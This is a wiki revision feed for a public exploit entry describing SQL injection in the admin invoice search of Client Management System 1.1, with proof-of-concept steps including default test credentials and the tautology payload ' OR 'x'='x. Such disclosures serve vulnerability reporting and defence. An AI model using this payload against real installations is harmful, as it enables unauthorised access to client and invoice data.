https://pwnwiki.com/index.php?action=history&feed=atom&title=Client_Management_System_1.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Client Management System 1.1 SQL注入漏洞 - Revision history
2026-04-15T04:29:43Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Client_Management_System_1.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=5108&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul...."
2021-06-16T01:34:58Z
<p>Created page with "==EXP== <pre> # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul...."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection<br />
# Date: 14 June 2021<br />
# Exploit Author: BHAVESH KAUL<br />
# Vendor Homepage: https://phpgurukul.com<br />
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/<br />
# Version: 1.1<br />
# Tested on: Server: XAMPP<br />
<br />
# Description #<br />
<br />
Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.<br />
<br />
# Proof of Concept (PoC) : Exploit #<br />
<br />
1) Goto: http://localhost/clientms/admin/index.php<br />
2) Login as admin using test credentials: admin/Test@123<br />
3) Goto: http://localhost/clientms/admin/search-invoices.php<br />
4) Enter the following payload in the search field: ' OR 'x'='x<br />
5) All results are showed instead of none ==> SQL Injection success<br />
</pre></div>
Pwnwiki